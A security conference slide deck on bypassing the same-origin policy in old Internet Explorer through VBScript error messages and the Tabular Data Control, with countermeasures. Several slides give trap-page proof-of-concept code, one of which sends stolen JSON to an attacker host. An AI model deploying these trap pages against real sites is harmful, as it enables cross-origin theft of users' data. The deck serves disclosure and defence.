Bypass SOP, Theft your data

March 19, 14

Slide overview

OWASP AppSec APAC 2014

Text of each page
1.

Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA

2.

About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member

3.

Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabular Data Control

4.

VBScript Error message

5.

VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Reading a JSON array as VBScript on a trap page created by the attacker
VBScript raises an exception whose error message includes the JSON content
JavaScript can access the JSON content via the error message

6.
VBScript Error Msg

Reading JSON as VBScript src
fail → raises exception
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]

// Trap page by attacker
<script
src="http://example.jp/target.json"
language="vbscript">
</script>

7.
VBScript Error Msg

catch error msg with error handler
<script>
window.onerror = function( e ){
    document.getElementById( "img" ).setAttribute(
        "src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json"
    language="vbscript"></script>

GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT
6.1; WOW64; Trident/6.0)

8.

Countermeasure
add "X-Content-Type-Options: nosniff"
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff

[ "secret", "data", "is", "here" ]

9.

VBScript Error Msg supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not.
"Add X-C-T-O header for IE9-11 to prevent this attack; this is BEHAVIOR BY DESIGN," they said.

10.

Tabular Data Control

11.
Tabular Data Control

Tabular Data Control - TDC
ActiveX control for binding a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx

Enabled by default on IE6-IE11, with older doc-mode

<meta http-equiv="x-ua-compatible" content="IE=10">

Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato

12.
Tabular Data Control
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff

@!allow_domains=attacker.utf-8.jp
secret,data,is,here

// Trap page by attacker on attacker.utf-8.jp
function show(){
    var s = document.getElementById("tdc").recordset.getString();
    alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
    classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://example.jp/target.txt">
</object>

13.

Tabular Data Control
Attacker has to insert "@!allow_domains=..." at the top of the target text
Once inserted, there is no way to prevent theft
Unhelpful:
X-Content-Type-Options: nosniff
Content-Disposition: attachment

14.

Countermeasure
Restrict access to XHR requests with a custom X- header
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );

GET /target.json HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest

and / or...

15.
Countermeasure (cont.)
Don't allow an attacker to place text at the top of the content
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here

16.

Conclusion

17.

Conclusion
IE has funny behavior even now
Add X-Content-Type-Options for all resources
Restrict access to XHR with custom X- header
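
The two countermeasures in the conclusion, applied on the server side, as an added example that is not from the slides: every response carries X-Content-Type-Options: nosniff, and the data is served only when the X-Requested-With header is present. The names decide() and handler() and the sample requests are assumptions made for illustration.

```javascript
// Added example, not from the slides: decide(), handler() and the sample
// requests are illustrative names and constructed data.
const SECRET_BODY = '[ "secret", "data", "is", "here" ]'; // body shown on the slides

// Sent on every response, error responses included.
const BASE_HEADERS = {
  "Content-Type": "application/json; charset=utf-8",
  "X-Content-Type-Options": "nosniff",
};

// Pure decision function. Header names are expected lower-cased, which is
// how Node's http module delivers them in req.headers.
function decide(method, headers) {
  if (method !== "GET") {
    // OPTIONS preflights end here with no CORS allow headers, so a browser
    // will not send a cross-origin XHR that adds the custom header.
    return { status: 405, headers: { ...BASE_HEADERS, Allow: "GET" }, body: "[]" };
  }
  // A <script src> load cannot attach custom request headers; the slides
  // rely on the same for the TDC DataURL fetch.
  if (headers["x-requested-with"] !== "XMLHttpRequest") {
    return { status: 403, headers: BASE_HEADERS, body: "[]" };
  }
  return { status: 200, headers: BASE_HEADERS, body: SECRET_BODY };
}

// Adapter with the (req, res) signature that http.createServer() expects.
function handler(req, res) {
  const r = decide(req.method, req.headers);
  res.writeHead(r.status, r.headers);
  res.end(r.body);
}

// Constructed requests: a script-style load from a trap page, then the XHR.
const scriptLoad = decide("GET", { accept: "*/*", referer: "http://attacker.utf-8.jp/" });
const xhrLoad = decide("GET", { accept: "*/*", "x-requested-with": "XMLHttpRequest" });
console.log(scriptLoad.status, xhrLoad.status);
```
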

18.

Question ?
[email protected] @hasegawayosuke http://utf-8.jp/